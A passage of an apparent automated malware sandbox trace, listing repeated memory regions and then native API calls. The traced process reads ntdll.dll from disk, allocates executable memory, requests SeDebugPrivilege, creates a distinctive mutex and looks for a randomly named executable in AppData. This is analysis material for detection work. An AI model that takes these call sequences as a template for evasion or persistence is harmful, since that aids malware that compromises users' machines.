filename = "" Region: id = 18204 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18207 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18208 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18209 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18210 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18217 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18218 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18220 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18221 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18223 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18224 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18225 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18226 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18227 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18228 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18229 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18230 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18231 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18232 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18233 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18234 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18235 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18236 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18237 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18238 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18239 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18240 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18241 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18242 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18243 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18244 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18245 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18246 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18247 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18248 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18249 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18250 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18251 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18252 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18253 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18254 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18255 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18256 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18257 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18258 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18259 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18260 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18261 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18262 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18263 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18264 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18265 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18266 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18267 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18268 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18269 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18270 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18271 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18272 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18273 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18274 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18275 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18276 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18277 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18278 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18279 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18280 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18281 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18282 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18283 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18284 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18285 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18286 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18287 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18288 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18289 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18290 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18291 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18292 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18293 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18294 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18295 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 18296 start_va = 0x4e0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Thread: id = 80 os_tid = 0xf9c [0183.970] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0xdf29c | out: HeapArray=0xdf29c*=0x500000) returned 0x2 [0183.981] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf24c, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0183.984] NtCreateFile (in: FileHandle=0xdf26c, DesiredAccess=0x120089, ObjectAttributes=0xdf234*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf254, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf26c*=0x20, IoStatusBlock=0xdf254*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0183.993] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505bd8) returned 1 [0184.010] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0xdf254, FileInformation=0xdf1ac, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0xdf254, FileInformation=0xdf1ac) returned 0x0 [0184.016] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1788a0) returned 0x5dfe020 [0184.053] NtReadFile (in: FileHandle=0x20, Event=0x0, UserApcRoutine=0x0, UserApcContext=0x0, IoStatusBlock=0xdf254, Buffer=0x5dfe020, BufferLength=0x1784a0, ByteOffset=0xdf1c4*=0, Key=0x0 | out: IoStatusBlock=0xdf254, Buffer=0x5dfe020*) returned 0x0 [0184.068] NtClose (Handle=0x20) returned 0x0 [0184.068] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x17b001) returned 0x5f80020 [0184.120] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5dfe020) returned 1 [0184.131] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdf240*=0x0, ZeroBits=0x0, RegionSize=0xdf244*=0x2f9522, AllocationType=0x3000, Protect=0x40 | out: BaseAddress=0xdf240*=0x6100000, RegionSize=0xdf244*=0x2fa000) returned 0x0 [0184.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x515958 [0184.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x516960 [0184.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x517968 [0184.193] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x518970 [0184.195] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x517968) returned 1 [0184.195] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x51a978 [0184.200] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x518970) returned 1 [0184.200] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x51d980 [0184.201] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51a978) returned 1 [0184.201] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x517968 [0184.201] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51d980) returned 1 [0184.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x51c970 [0184.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x51d978 [0184.202] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51c970) returned 1 [0184.202] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x51f980 [0184.203] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51d978) returned 1 [0184.203] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x522988 [0184.204] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51f980) returned 1 [0184.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x51c970 [0184.204] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x522988) returned 1 [0184.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x521978 [0184.204] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x522980 [0184.205] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x521978) returned 1 [0184.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x524988 [0184.205] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x522980) returned 1 [0184.205] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x527990 [0184.207] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x524988) returned 1 [0184.207] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x521978 [0184.207] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x527990) returned 1 [0184.207] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x515958) returned 1 [0184.208] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x516960) returned 1 [0184.208] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x517968) returned 1 [0184.209] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51c970) returned 1 [0184.210] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x521978) returned 1 [0184.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x515958 [0184.240] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x516960 [0184.240] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x517968 [0184.240] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x518970 [0184.241] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x517968) returned 1 [0184.241] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x51a978 [0184.242] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x518970) returned 1 [0184.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x51d980 [0184.243] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51a978) returned 1 [0184.275] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x517968 [0184.276] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51d980) returned 1 [0184.277] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x51c970 [0184.277] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x51d978 [0184.278] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51c970) returned 1 [0184.278] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x51f980 [0184.278] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51d978) returned 1 [0184.278] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x522988 [0184.279] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51f980) returned 1 [0184.279] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x51c970 [0184.279] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x522988) returned 1 [0184.279] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x521978 [0184.279] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x2000) returned 0x522980 [0184.280] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x521978) returned 1 [0184.280] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x3000) returned 0x524988 [0184.280] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x522980) returned 1 [0184.280] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x4000) returned 0x527990 [0184.281] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x524988) returned 1 [0184.281] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5000) returned 0x521978 [0184.281] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x527990) returned 1 [0184.281] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x515958) returned 1 [0184.282] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x516960) returned 1 [0184.282] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x517968) returned 1 [0184.283] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x51c970) returned 1 [0184.284] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x521978) returned 1 [0184.285] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Windows\\SYSTEM32\\ntdll.dll", NtPathName=0xdf1ec, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0184.285] NtCreateFile (in: FileHandle=0xdf20c, DesiredAccess=0x120089, ObjectAttributes=0xdf1d4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Windows\\SYSTEM32\\ntdll.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdf1f4, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdf20c*=0x20, IoStatusBlock=0xdf1f4*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0184.285] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x505bd8) returned 1 [0184.285] NtQueryInformationFile (in: FileHandle=0x20, IoStatusBlock=0xdf1f4, FileInformation=0xdef68, Length=0x208, FileInformationClass=0x9 | out: IoStatusBlock=0xdf1f4, FileInformation=0xdef68) returned 0x0 [0184.285] NtClose (Handle=0x20) returned 0x0 [0184.285] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x208) returned 0x515958 [0184.286] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x515958) returned 1 [0184.292] NtQueryVirtualMemory (in: ProcessHandle=0xffffffff, Address=0x6ff411d0, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0xdf228, Length=0x1c, ResultLength=0x0 | out: VirtualMemoryInformation=0xdf228*(BaseAddress=0x6ff41000, AllocationBase=0x6ff40000, AllocationProtect=0x80, RegionSize=0x2000, State=0x1000, Protect=0x20, Type=0x1000000), ResultLength=0x0) returned 0x0 [0184.970] NtQuerySystemInformation (in: SystemInformationClass=0x23, SystemInformation=0xdf280, Length=0x2, ResultLength=0x0 | out: SystemInformation=0xdf280, ResultLength=0x0) returned 0x0 [0185.004] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0xdf2a4, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdf2a4, ReturnLength=0x0) returned 0x0 [0185.163] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x5f80020) returned 1 [0185.182] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef34*=0x0, ZeroBits=0x0, RegionSize=0xdef38*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef34*=0x1e0000, RegionSize=0xdef38*=0x10000) returned 0x0 [0185.189] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0185.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x1e0000, RegionSize=0xdef58, FreeType=0x8000) returned 0x0 [0185.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdef20*=0x0, ZeroBits=0x0, RegionSize=0xdef24*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdef20*=0x1e0000, RegionSize=0xdef24*=0x20000) returned 0x0 [0185.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0185.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf294*=0x1e0000, RegionSize=0xdf298, FreeType=0x8000) returned 0x0 [0185.292] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdf050 | out: Value="RDhJ0CNFevzX") returned 0x0 [0185.300] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xdf2ac | out: TokenHandle=0xdf2ac*=0x20) returned 0x0 [0185.305] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xdf2a0 | out: lpLuid=0xdf2a0*(LowPart=0x14, HighPart=0)) returned 1 [0185.317] NtAdjustPrivilegesToken (in: TokenHandle=0x20, DisableAllPrivileges=0, NewState=0xdf29c, BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 0x106 [0185.327] NtClose (Handle=0x20) returned 0x0 [0185.328] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xdebe0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0185.329] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="0M1P2-24", Value=0xdf08c | out: Value=0xdf08c) returned 0xc0000100 [0185.329] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="USERNAME", Value=0xde9c0 | out: Value="RDhJ0CNFevzX") returned 0x0 [0185.334] NtOpenDirectoryObject (in: FileHandle=0xdee80, DesiredAccess=0x2000f, ObjectAttributes=0xdee4c*(Length=0x18, RootDirectory=0x0, ObjectName="\\BaseNamedObjects", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: FileHandle=0xdee80*=0x20) returned 0x0 [0185.337] NtCreateMutant (in: MutantHandle=0xdf0ac, DesiredAccess=0x1f0001, ObjectAttributes=0xdee34*(Length=0x18, RootDirectory=0x20, ObjectName="0M1P2-24V-8B9WJ_", Attributes=0x80, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), InitialOwner=0 | out: MutantHandle=0xdf0ac*=0x1ec) returned 0x0 [0185.338] NtClose (Handle=0x20) returned 0x0 [0185.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x5185d0 [0185.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x5195d8 [0185.346] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x1000) returned 0x51a5e0 [0185.347] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="ProgramFiles", Value=0xdecec | out: Value="C:\\Program Files (x86)") returned 0x0 [0185.347] RtlQueryEnvironmentVariable_U (in: Environment=0x0, Name="APPDATA", Value=0xdece8 | out: Value="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0185.369] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtPathName=0xdec94, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RDhJ0CNFevzX\\gIkAOpZB.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0185.372] NtCreateFile (in: FileHandle=0xdecb4, DesiredAccess=0x120089, ObjectAttributes=0xdec7c*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\RDhJ0CNFevzX\\gIkAOpZB.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0xdec9c, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0xdecb4*=0x0, IoStatusBlock=0xdec9c*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0185.373] RtlFreeHeap (HeapHandle=0x500000, Flags=0x0, BaseAddress=0x50f8a0) returned 1 [0185.373] RtlDosPathNameToNtPathName_U (in: 